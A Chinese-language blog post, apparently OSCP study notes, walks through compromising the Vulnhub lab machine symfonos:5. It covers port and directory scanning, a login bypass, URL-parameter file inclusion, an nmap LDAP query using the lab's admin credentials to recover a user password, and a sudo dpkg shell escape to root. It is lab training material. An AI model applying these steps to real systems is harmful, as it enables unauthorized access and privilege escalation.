OSCP备考_0x22_Vulnhub靶机_symfonos: 5

Ethan医生4个月前靶场139


名称说明
靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.188



arp-scan 192.168.233.1/24


image.png

nmap -p- 192.168.233.188 


image.png


nmap -p22,80,389,636 -A -sV -T5 192.168.233.188


image.png


gobuster dir -u http://192.168.233.188/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

http://192.168.233.188/portraits.php

image.png

爆破admin.php 一直无法成功后面,使用万能账号可以登入

image.png

登入后发现有URL参数可以提交

image.png


192.168.233.188/home.php?url=http://127.0.0.1/portraits.php 

这边没有测试成功说是有文件包含可以利用URL

上述通过文件包含的形式获取到了文件admin.php的源代码,里面代码显示有ldap的相关信息,尝试直接使用nmap直接扫描ldap的端口389直接获得了一个账户为zeus密码是cetkKf4wCuHC9FET 具体获得的过程如下:

nmap 192.168.233.188 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"'

image.png0

userPassword: cetkKf4wCuHC9FET

使用此账户直接通过ssh登录目标靶机

image.png


image.png

利用dpkg,https://gtfobins.github.io/gtfobins/dpkg/

sudo dpkg -l
!/bin/sh

image.png


标签: OSCP

相关文章

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。